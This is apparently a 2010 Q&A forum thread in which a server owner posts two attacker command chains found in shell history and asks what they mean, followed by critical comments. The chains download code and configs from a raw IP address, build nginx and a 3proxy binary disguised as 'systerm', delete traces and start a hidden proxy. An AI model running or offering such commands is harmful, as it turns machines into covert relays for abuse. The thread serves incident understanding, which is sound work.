1
Somebody hacked my private server and i found below command form the command line history. Can any body explain what is this means?
1. wget http://sysoev.ru/nginx/nginx-0.7.64.tar.gz && tar zxf nginx-0.7.64.tar.gz && cd nginx-0.7.64 && ./configure --without-http_gzip_module --with-http_stub_status_module --without-http-cache ; make install && cd ../ && rm -fr ngi* && wget 94.75.210.13/nsm3.conf -O /usr/local/nginx/conf/nginx.conf && env -i /usr/local/nginx/sbin/nginx
and
2. wget 94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &
3To be honest, one who has his own private server should at least know the meaning of 'wget' and 'tar'. – user1686 – 2010-01-11T13:08:25.060
1To agree with the previous comment: from your comments here, you don't seem to have even a very basic idea of how to run a server or how to secure a server. You should shut it down and use a server that is run professionally. Odds are your own server is being used right now by either a spammer or a malware-spreader. Running a server badly is bad citizenship. – CarlF – 2010-01-11T15:10:07.403
1@CarlF: I both agree and disagree with you. I agree because running a server badly let one become a potential accomplice of some villain; I disagree because if Mithun will keep on trying, breaking and fixing he will learn. @Mithun: On the other hand...RTFM FIRTS! :D – dag729 – 2010-01-11T15:39:13.010
@dag729, I hope you're right, but ... someone who can't even type "man wget"? Wrong attitude. – CarlF – 2010-01-12T02:16:13.270
I know what the wget, tar and man are but nothing about the nginx and 3proxy, i just want to know what the intruder was actually trying to achieve – Mithun Sreedharan – 2010-01-12T03:37:07.590